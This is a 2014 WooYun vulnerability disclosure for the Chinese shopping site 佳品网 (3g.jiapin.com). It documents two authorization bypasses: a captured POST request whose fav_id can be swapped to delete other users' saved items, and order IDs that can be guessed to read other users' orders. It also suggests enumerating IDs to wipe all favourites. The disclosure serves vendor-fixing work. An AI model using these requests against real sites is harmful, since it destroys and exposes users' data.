佳品网两处平行权限漏洞 | wooyun-2014-050921| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-050921

漏洞标题：佳品网两处平行权限漏洞

漏洞作者： niliu

提交时间：2014-02-14 12:07

修复时间：2014-03-31 12:08

公开时间：2014-03-31 12:08

漏洞类型：未授权访问/权限绕过

危害等级：中

自评Rank：8

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-02-14：细节已通知厂商并且等待厂商处理中
2014-02-17：厂商已经确认，细节仅向厂商公开
2014-02-27：细节向核心白帽子及相关领域专家公开
2014-03-09：细节向普通白帽子公开
2014-03-19：细节向实习白帽子公开
2014-03-31：细节向公众公开

简要描述：

再来一发...

详细说明：

问题出现在3g.jiapin.com
可越权删除他人收藏商品。
首先我登陆用户1：tang，随便收藏一个商品，firebug看一下删除商品收藏id，219885。

截获一下删除请求

POST /myinfo/ajaxdelfav HTTP/1.1
Host: 3g.jiapin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: */*
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://3g.jiapin.com/myinfo/mycollect
Content-Length: 13
Cookie: __utm
Pragma: no-cache
Cache-Control: no-cache
fav_id=219885

然后登陆账号2：cao，看一下收藏商品id。219886

把请求里的fav_id替换成账号2（cao）的219886并发包

\u5220\u9664\u6210\u529f 转码删除成功

然后回到用户cao的收藏中看一下

已经删除了。。。
这里如果我对fav_id从1-219887遍历一遍，就可以把所有用户收藏的商品清空！
这里只是举个例子测试了一下，并没有恶意删除。
第二处：未对订单信息做权限判断，导致可以遍历他人订单信息
用户cao登陆，下单查看一下订单信息

http://3g.jiapin.com/orders/getorderinfo?order_id=V313571140214111419

再登陆tang的账号，看一下订单信息，记录下订单号。

订单号：V47427140214112206
测试发现，47427为用户id，140214为当天日期年月日，112206为下单时间时分秒。
直接用cao的账号刚问这个tang的订单信息是可以越权访问的。

http://3g.jiapin.com/orders/getorderinfo?order_id=V47427140214112206

这个订单号获取比较难，可以对id进行遍历，也可以对日期进行遍历猜解。太麻烦所以利用难度高危害低。就提一下吧。

漏洞证明：

上面

修复方案：

佳品网的小伙伴们双节快乐啊~ ：）

版权声明：转载请注明来源 niliu@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2014-02-17 10:49

厂商回复：

谢啦，谢啦

漏洞评价：

2014-02-14 12:20 | niliu ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

@xsser @疯狗 @Finger 怎么小厂商了... 这可是第一次越权。。
2014-02-14 12:29 | 小川 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

@niliu 来顶一下
2014-02-14 12:31 | niliu ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

@xsser @疯狗 @Finger 又添加了一处越权，帮忙审核一下，顺便改下别小厂商啦：）
2014-02-14 12:31 | niliu ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

@小川哈哈，第一次就悲剧了

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-050921

漏洞标题：佳品网两处平行权限漏洞

相关厂商：佳品网

漏洞作者： niliu

提交时间：2014-02-14 12:07

修复时间：2014-03-31 12:08

公开时间：2014-03-31 12:08

漏洞类型：未授权访问/权限绕过

危害等级：中

自评Rank：8

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 niliu@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-050921

漏洞标题：佳品网两处平行权限漏洞

相关厂商：佳品网

漏洞作者： niliu

提交时间：2014-02-14 12:07

修复时间：2014-03-31 12:08

公开时间：2014-03-31 12:08

漏洞类型：未授权访问/权限绕过

危害等级：中

自评Rank：8

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-050921"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 niliu@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：